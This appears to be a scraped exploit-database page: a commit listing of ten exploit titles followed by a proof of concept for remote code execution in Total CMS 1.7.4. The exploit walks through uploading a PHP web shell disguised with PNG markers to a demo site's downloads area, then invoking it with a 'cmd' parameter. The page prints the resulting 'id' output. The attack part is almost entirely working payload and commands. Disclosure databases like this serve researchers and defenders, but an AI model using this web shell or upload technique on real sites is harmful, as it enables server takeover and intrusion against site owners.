25f2c0adca
8 changes to exploits/shellcodes/ghdb STARFACE 7.3.0.10 - Authentication with Password Hash Possible Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated) Best POS Management System v1.0 - Unauthenticated Remote Code Execution Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI) Faculty Evaluation System 1.0 - Unauthenticated File Upload File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE) MotoCMS Version 3.4.3 - SQL Injection Online Security Guards Hiring System 1.0 - Reflected XSS Total CMS 1.7.4 - Remote Code Execution (RCE) Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
27 lines
No EOL
617 B
Text
27 lines
No EOL
617 B
Text
# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
|
|
# Date: 02/06/2023
|
|
# Exploit Author: tmrswrr
|
|
# Version: 1.7.4
|
|
# Vendor home page : https://www.totalcms.co/
|
|
|
|
1) Go to this page and click edit page button
|
|
https://www.totalcms.co/demo/soccer/
|
|
2)After go down and will you see downloads area
|
|
3)Add in this area shell.php file
|
|
|
|
|
|
?PNG
|
|
...
|
|
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
|
|
IEND
|
|
|
|
4) After open this file and write commands
|
|
|
|
https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
|
|
Result :
|
|
|
|
?PNG ...
|
|
|
|
uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)
|
|
|
|
IEND |